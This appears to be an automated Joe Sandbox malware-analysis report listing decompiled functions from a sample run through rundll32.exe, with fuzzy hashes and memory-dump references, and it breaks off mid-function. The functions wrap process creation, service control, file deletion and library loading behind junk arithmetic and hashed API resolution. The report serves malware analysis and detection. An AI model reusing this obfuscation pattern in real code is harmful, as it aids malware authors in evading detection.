Snapshot File: hcaresult_16_2_300000_rundll32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID: /O
API String ID: 1514166925-1923427199
Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction ID: 473e4457bc095cefe19829fa54d3b54b62163a5d46169dbc0064cfdecc6e9301
Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction Fuzzy Hash: EB1133B290122DBBCB25DF94DC4A8DFBFB8EF04714F108188F90966250D3B14B659BE0

Uniqueness

Uniqueness Score: -1.00%

Function 00301000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00301000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t33;
				struct HINSTANCE__* _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E0030602B(_t33);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x1b2eda;
				_v20 = 0x33a3b7;
				_v12 = 0x98c;
				_v12 = _v12 + 0xb426;
				_v12 = _v12 + 0x5beb;
				_t42 = 0x63;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x00000fce;
				_v8 = 0x120e;
				_v8 = _v8 + 0xfffffcb8;
				_v8 = _v8 + 0xffffefaa;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x07ff9a02;
				E003107A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
				_t40 = LoadLibraryW(_a12); // executed
				return _t40;
			}

0x00301006
0x00301009
0x0030100c
0x00301011
0x00301016
0x0030101d
0x00301026
0x0030102d
0x00301034
0x0030103b
0x00301047
0x0030104f
0x00301057
0x0030105e
0x00301065
0x0030106c
0x00301073
0x00301077
0x0030108b
0x00301096
0x0030109b

APIs

LoadLibraryW.KERNEL32(0033A3B7), ref: 00301096

Strings

[, xrefs: 0030103B

Memory Dump Source

Source File: 00000010.00000002.2101888822.0000000000301000.00000020.00000001.sdmp, Offset: 00300000, based on PE: true

Associated: 00000010.00000002.2101867514.0000000000300000.00000004.00000001.sdmp Download File
Associated: 00000010.00000002.2102021089.000000000031C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_300000_rundll32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: [
API String ID: 1029625771-3431493590
Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction ID: 35d8d82c9ac8a57af9591f433f228e813002c0f2c7087b86e36d719f0cea35bb
Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction Fuzzy Hash: E9016DB6D0130DFBDF04DF94C94A5DEBBB1EF54318F108188E41466291D3B19B649B91

Uniqueness

Uniqueness Score: -1.00%

Function 00304859, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00304859() {
				signed int _v8;
				signed int _v12;
				void* _t22;

				_v12 = 0xafe2;
				_v12 = _v12 * 0x42;
				_v12 = _v12 + 0xffffdd89;
				_v12 = _v12 ^ 0x002d198d;
				_v8 = 0x5b09;
				_v8 = _v8 | 0xa1ea9544;
				_v8 = _v8 * 0x12;
				_v8 = _v8 ^ 0x6283d9c1;
				E003107A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
				ExitProcess(0);
			}

0x0030485e
0x0030487a
0x0030487d
0x00304884
0x0030488b
0x00304892
0x0030489d
0x003048a0
0x003048ad
0x003048b7

APIs

ExitProcess.KERNELBASE(00000000), ref: 003048B7

Strings

[, xrefs: 0030488B

Memory Dump Source

Source File: 00000010.00000002.2101888822.0000000000301000.00000020.00000001.sdmp, Offset: 00300000, based on PE: true

Associated: 00000010.00000002.2101867514.0000000000300000.00000004.00000001.sdmp Download File
Associated: 00000010.00000002.2102021089.000000000031C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_300000_rundll32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID: [
API String ID: 621844428-1822564810
Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction ID: a8eaed4c662434089662cc71a56a9ab54bb7ef672fd4f95df06cb24e74636ac0
Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction Fuzzy Hash: 54F017B0A05209FBDB08CFE8CA5699EBFB9EB40301F20818CE444BB290E3B15F509B50

Uniqueness

Uniqueness Score: -1.00%

Function 00314F7D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 66%

			E00314F7D(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t17;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E0030602B(_t17);
				_v12 = 0xddd8;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x003e66d8;
				_v8 = 0xcb35;
				_v8 = _v8 ^ 0x7b88573c;
				_v8 = _v8 * 0x59;
				_v8 = _v8 ^ 0xf27e4a21;
				E003107A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
				_t24 = CloseHandle(_a4); // executed
				return _t24;
			}

0x00314f80
0x00314f81
0x00314f82
0x00314f86
0x00314f87
0x00314f8c
0x00314fa5
0x00314fa8
0x00314faf
0x00314fb6
0x00314fc7
0x00314fca
0x00314fd7
0x00314fe2
0x00314fe7

APIs

CloseHandle.KERNELBASE(003E66D8), ref: 00314FE2

Strings

{#lm, xrefs: 00314FC2

Memory Dump Source

Source File: 00000010.00000002.2101888822.0000000000301000.00000020.00000001.sdmp, Offset: 00300000, based on PE: true

Associated: 00000010.00000002.2101867514.0000000000300000.00000004.00000001.sdmp Download File
Associated: 00000010.00000002.2102021089.000000000031C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_300000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID: {#lm
API String ID: 2962429428-1564096886
Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction ID: aad0744ddfed0a697945f0eba90a6b93794205c57b3def04785ab26c052f95d1
Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction Fuzzy Hash: B8F037B081120CFFDB09DFA4D94289EBFBAEB44300F208199E805BB250D3715B509B50

Uniqueness

Uniqueness Score: -1.00%

Function 0031976F, Relevance: 1.6, APIs: 1, Instructions: 63
processCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E0031976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
				unsigned int _v8;
				signed int _v12;
				void* _t34;
				int _t39;
				struct _PROCESS_INFORMATION* _t48;

				_push(__ecx);
				_push(__ecx);
				_t48 = __edx;
				_push(0);
				_push(_a68);
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0030602B(_t34);
				_v12 = 0xaff9;
				_v12 = _v12 | 0xcee54bd1;
				_v12 = _v12 + 0x6ed6;
				_v12 = _v12 ^ 0xcee61221;
				_v8 = 0x6229;
				_v8 = _v8 ^ 0x42aa9f31;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x10aad83f;
				E003107A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
				return _t39;
			}

0x00319772
0x00319773
0x00319778
0x0031977a
0x0031977b
0x0031977e
0x0031977f
0x00319782
0x00319785
0x00319788
0x00319789
0x0031978c
0x0031978f
0x00319790
0x00319791
0x00319794
0x00319797
0x0031979a
0x0031979d
0x003197a0
0x003197a3
0x003197a6
0x003197a7
0x003197a8
0x003197ad
0x003197b7
0x003197c3
0x003197ca
0x003197d1
0x003197d8
0x003197df
0x003197e3
0x003197fc
0x00319816
0x0031981d

APIs

CreateProcessW.KERNEL32(0030591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,0030591A), ref: 00319816

Memory Dump Source

Source File: 00000010.00000002.2101888822.0000000000301000.00000020.00000001.sdmp, Offset: 00300000, based on PE: true

Associated: 00000010.00000002.2101867514.0000000000300000.00000004.00000001.sdmp Download File
Associated: 00000010.00000002.2102021089.000000000031C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_300000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction ID: 0b480bb28b3bf3a6b661765e2c3c5c638535f6d9ce7e594d750eeb880bea4f94
Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction Fuzzy Hash: 3A11D372801148FBDF1A9F92DC0ACDF7F3AEF89750F104048FA1556120D2728AA0EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0030B566, Relevance: 1.6, APIs: 1, Instructions: 55
fileCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E0030B566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
				unsigned int _v8;
				signed int _v12;
				void* _t32;
				void* _t38;
				long _t47;

				_push(__ecx);
				_push(__ecx);
				_push(_a48);
				_t47 = __edx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E0030602B(_t32);
				_v8 = 0xfd14;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00002bef;
				_v12 = 0x4f26;
				_v12 = _v12 | 0xe7e97f76;
				_v12 = _v12 ^ 0xe7e94dbb;
				E003107A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
				return _t38;
			}

0x0030b569
0x0030b56a
0x0030b56d
0x0030b572
0x0030b574
0x0030b577
0x0030b57a
0x0030b57d
0x0030b580
0x0030b583
0x0030b586
0x0030b587
0x0030b58a
0x0030b58d
0x0030b590
0x0030b593
0x0030b594
0x0030b595
0x0030b59a
0x0030b5a4
0x0030b5b8
0x0030b5c0
0x0030b5c4
0x0030b5cb
0x0030b5d2
0x0030b5d9
0x0030b5e6
0x0030b5fd
0x0030b604

APIs

CreateFileW.KERNELBASE(00310668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,00310668,?,?,?,?), ref: 0030B5FD

Memory Dump Source

Source File: 00000010.00000002.2101888822.0000000000301000.00000020.00000001.sdmp, Offset: 00300000, based on PE: true

Associated: 00000010.00000002.2101867514.0000000000300000.00000004.00000001.sdmp Download File
Associated: 00000010.00000002.2102021089.000000000031C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_300000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction ID: 2baaed0a4a901f621491fce1f0924631d930798d2c5d47a9d45f3bc8a01ece94
Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction Fuzzy Hash: A211BF72801248BBDF16DF95DD06CEE7FBAEF89314F148198FA1866160D3729A60EB50

Uniqueness

Uniqueness Score: -1.00%

Function 0031981E, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E0031981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t28;
				void* _t34;
				long _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t34 = __edx;
				_t37 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0030602B(_t22);
				_v12 = 0xe68;
				_v12 = _v12 * 0x39;
				_v12 = _v12 ^ 0xd1b1d871;
				_v12 = _v12 ^ 0xd1b2fb7e;
				_v8 = 0x629e;
				_v8 = _v8 + 0xfffff5da;
				_v8 = _v8 | 0xbef7b77b;
				_v8 = _v8 ^ 0xbef79fc3;
				E003107A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
				return _t28;
			}

0x00319821
0x00319822
0x00319825
0x00319828
0x0031982a
0x0031982c
0x0031982f
0x00319832
0x00319835
0x00319836
0x00319837
0x0031983c
0x00319855
0x00319858
0x0031985f
0x00319866
0x0031986d
0x00319874
0x0031987b
0x0031988e
0x0031989b
0x003198a2

APIs

RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,003087F2,0000CAAE,0000510C,AD82F196), ref: 0031989B

Memory Dump Source

Source File: 00000010.00000002.2101888822.0000000000301000.00000020.00000001.sdmp, Offset: 00300000, based on PE: true

Associated: 00000010.00000002.2101867514.0000000000300000.00000004.00000001.sdmp Download File
Associated: 00000010.00000002.2102021089.000000000031C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_300000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction ID: 46b86857c3e1cf540fa9c16a4540c2491274cfb26cf806c1a22d7eb78e9a0559
Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction Fuzzy Hash: 53019A76801208FBDB08EFD5D846CDFBF79EF85310F108188F908A6260E6725B619BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00317BF4, Relevance: 1.5, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00317BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				int _t31;
				signed int _t33;
				struct _SHFILEOPSTRUCTW* _t40;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_t40 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0030602B(_t24);
				_v8 = 0xa117;
				_t33 = 0x76;
				_v8 = _v8 / _t33;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x210fe703;
				_v8 = _v8 ^ 0x210fdcea;
				_v12 = 0xf1e9;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0x01e3a445;
				E003107A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
				_t31 = SHFileOperationW(_t40); // executed
				return _t31;
			}

0x00317bf7
0x00317bf8
0x00317bfa
0x00317bfd
0x00317bff
0x00317c02
0x00317c06
0x00317c07
0x00317c0f
0x00317c1d
0x00317c25
0x00317c2d
0x00317c31
0x00317c38
0x00317c3f
0x00317c46
0x00317c4a
0x00317c5e
0x00317c67
0x00317c6d

APIs

SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 00317C67

Memory Dump Source

Source File: 00000010.00000002.2101888822.0000000000301000.00000020.00000001.sdmp, Offset: 00300000, based on PE: true

Associated: 00000010.00000002.2101867514.0000000000300000.00000004.00000001.sdmp Download File
Associated: 00000010.00000002.2102021089.000000000031C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_300000_rundll32.jbxd

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction ID: 3999f5b4a4d48d476ac170011a2ae51ce66f8e47dcb36fca502763bb548fc6a3
Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction Fuzzy Hash: 16014FB190120CFFEB09DF94C84A8DE7BB5EF44314F108198F40567240E6B15F509B91

Uniqueness

Uniqueness Score: -1.00%

Function 0030F65F, Relevance: 1.5, APIs: 1, Instructions: 40
serviceCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E0030F65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				void* _t24;
				void* _t29;
				int _t35;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t35 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0030602B(_t24);
				_v12 = 0xd5a7;
				_v12 = _v12 ^ 0x994cba9d;
				_v12 = _v12 ^ 0x994c19d3;
				_v8 = 0xac88;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xebed;
				_v8 = _v8 ^ 0x0000ab82;
				E003107A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
				return _t29;
			}

0x0030f662
0x0030f663
0x0030f665
0x0030f668
0x0030f66a
0x0030f66d
0x0030f670
0x0030f673
0x0030f677
0x0030f678
0x0030f67d
0x0030f687
0x0030f693
0x0030f69a
0x0030f6a1
0x0030f6a5
0x0030f6a9
0x0030f6b0
0x0030f6c9
0x0030f6d8
0x0030f6de

APIs

OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 0030F6D8

Memory Dump Source

Source File: 00000010.00000002.2101888822.0000000000301000.00000020.00000001.sdmp, Offset: 00300000, based on PE: true

Associated: 00000010.00000002.2101867514.0000000000300000.00000004.00000001.sdmp Download File
Associated: 00000010.00000002.2102021089.000000000031C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_300000_rundll32.jbxd

Yara matches

Similarity

API ID: OpenService
String ID:
API String ID: 3098006287-0
Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction ID: 9afe9ac889dd8de440ed2f8c18b4b10a0fbd78386bd6b0b74f8f541e54721fd1
Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction Fuzzy Hash: 3A01E5B6901208BBEF059F94DC068DF7F75EB05324F148188F90566250D6B25E61DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0030B6DD, Relevance: 1.5, APIs: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0030B6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				void* _t23;
				intOrPtr* _t27;
				void* _t28;

				E0030602B(_t23);
				_v12 = 0x9431;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0000160f;
				_v8 = 0xc972;
				_v8 = _v8 ^ 0x829e0126;
				_v8 = _v8 + 0x4512;
				_v8 = _v8 + 0xffff18f9;
				_v8 = _v8 ^ 0x829e24c1;
				_t27 = E003107A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
				return _t28;
			}

0x0030b6f3
0x0030b6f8
0x0030b702
0x0030b70b
0x0030b712
0x0030b719
0x0030b720
0x0030b727
0x0030b72e
0x0030b747
0x0030b759
0x0030b75e

APIs

SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 0030B759

Memory Dump Source

Source File: 00000010.00000002.2101888822.0000000000301000.00000020.00000001.sdmp, Offset: 00300000, based on PE: true

Associated: 00000010.00000002.2101867514.0000000000300000.00000004.00000001.sdmp Download File
Associated: 00000010.00000002.2102021089.000000000031C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_300000_rundll32.jbxd

Yara matches

Similarity

API ID: FileHandleInformation
String ID:
API String ID: 3935143524-0
Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction ID: 3e9d405c060b8cba6226d27e6013a693f807802629d6ff1de89f24ee2fab1871
Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction Fuzzy Hash: 26014FB594130CFBEF45DF94DD06E9E7BB5EF18704F108188FA056A190D3B25E209B51

Uniqueness

Uniqueness Score: -1.00%

Function 0031AA3C, Relevance: 1.5, APIs: 1, Instructions: 34
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0031AA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0030602B(_t21);
				_v12 = 0xcc49;
				_v12 = _v12 << 6;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x000ca988;
				_v8 = 0x5d85;
				_v8 = _v8 | 0xb9d19a55;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x6fa87272;
				E003107A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
				_t27 = DeleteFileW(_a12); // executed
				return _t27;
			}

0x0031aa3f
0x0031aa40
0x0031aa41
0x0031aa44
0x0031aa47
0x0031aa4b
0x0031aa4c
0x0031aa51
0x0031aa5b
0x0031aa64
0x0031aa68
0x0031aa6f
0x0031aa76
0x0031aa8d
0x0031aa90
0x0031aa9d
0x0031aaa8
0x0031aaad

APIs

DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 0031AAA8

Memory Dump Source

Source File: 00000010.00000002.2101888822.0000000000301000.00000020.00000001.sdmp, Offset: 00300000, based on PE: true

Associated: 00000010.00000002.2101867514.0000000000300000.00000004.00000001.sdmp Download File
Associated: 00000010.00000002.2102021089.000000000031C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_300000_rundll32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction ID: 0030dac20115c12f8661d0f782f0a2d29d415ce75f474cb1b6fbbfcc2741180d
Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction Fuzzy Hash: 2EF069B590020CFFDF08DF94DD4A89EBFB4EB44304F108088F805A6250D3B29B649B50

Uniqueness

Uniqueness Score: -1.00%

Function 00305FB2, Relevance: 1.5, APIs: 1, Instructions: 33
serviceCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00305FB2(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E0030602B(_t21);
				_v12 = 0x33d;
				_v12 = _v12 + 0xc3dc;
				_v12 = _v12 | 0x39ccfb02;
				_v12 = _v12 ^ 0x39ccf342;
				_v8 = 0xe8d9;
				_v8 = _v8 * 0x16;
				_v8 = _v8 | 0x4145347f;
				_v8 = _v8 ^ 0x9035ef96;
				_v8 = _v8 ^ 0xd1609914;
				E003107A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
				_t27 = CloseServiceHandle(_a4); // executed
				return _t27;
			}

0x00305fb5
0x00305fb6
0x00305fb7
0x00305fbb
0x00305fbc
0x00305fc1
0x00305fcb
0x00305fd7
0x00305fde
0x00305fe5
0x00305ffc
0x00305fff
0x00306006
0x0030600d
0x0030601a
0x00306025
0x0030602a

APIs

CloseServiceHandle.ADVAPI32(39CCF342), ref: 00306025

Memory Dump Source

Source File: 00000010.00000002.2101888822.0000000000301000.00000020.00000001.sdmp, Offset: 00300000, based on PE: true

Associated: 00000010.00000002.2101867514.0000000000300000.00000004.00000001.sdmp Download File
Associated: 00000010.00000002.2102021089.000000000031C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_300000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandleService
String ID:
API String ID: 1725840886-0
Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
Instruction ID: d25ed8cb3631d1dbc3ddd8e8c19195cbba15e5e33fe084df99f0b18321cbf2bd
Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
Instruction Fuzzy Hash: 0BF044B4C11208FFDB08DFA0E94789EBF78EB40300F108198E40967160D7715F559F54

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 2720 Parent PID: 2948 rundll32.exeCOMMON

Executed Functions

Function 00152959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 62%

			E00152959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t30;
				void* _t39;
				signed int _t41;
				signed int _t42;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E0015602B(_t30);
				_v12 = 0x5e3c;
				_t41 = 0x63;
				_v12 = _v12 / _t41;
				_t42 = 0x2f;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x000064be;
				_v8 = 0x74da;
				_v8 = _v8 | 0xfefeeaea;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x000fb531;
				E001607A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
				_t39 = OpenSCManagerW(0, 0, _a16); // executed
				return _t39;
			}

0x0015295f
0x00152964
0x00152967
0x0015296a
0x0015296d
0x0015296e
0x0015296f
0x00152977
0x00152985
0x0015298a
0x00152992
0x0015299a
0x001529a2
0x001529a9
0x001529b0
0x001529b7
0x001529bb
0x001529cf
0x001529dc
0x001529e2

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 001529DC

Strings

<^, xrefs: 00152977

Memory Dump Source

Source File: 00000011.00000002.2103660076.0000000000151000.00000020.00000001.sdmp, Offset: 00150000, based on PE: true

Associated: 00000011.00000002.2103653514.0000000000150000.00000004.00000001.sdmp Download File
Associated: 00000011.00000002.2103728286.000000000016C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_150000_rundll32.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID: <^
API String ID: 1889721586-3203995635
Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction ID: faed99b1957be884dd72f3b2a8d8899105e4267b9c80c83d6266e8a0f0fd155d
Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction Fuzzy Hash: DB016D72A00108BFEB14DF95DC0A8DFBFB6EF48310F108088F508A6250D7B65F619B91

Uniqueness

Uniqueness Score: -1.00%

Function 0015C6C7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E0015C6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t29;
				intOrPtr* _t33;
				void* _t34;

				E0015602B(_t29);
				_v28 = 0x4fe02f;
				_v24 = 0x232390;
				_v20 = 0xf8460;
				_v16 = 0;
				_v12 = 0xf625;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0xffffcc6f;
				_v12 = _v12 ^ 0xffffa5b6;
				_v8 = 0xe5cd;
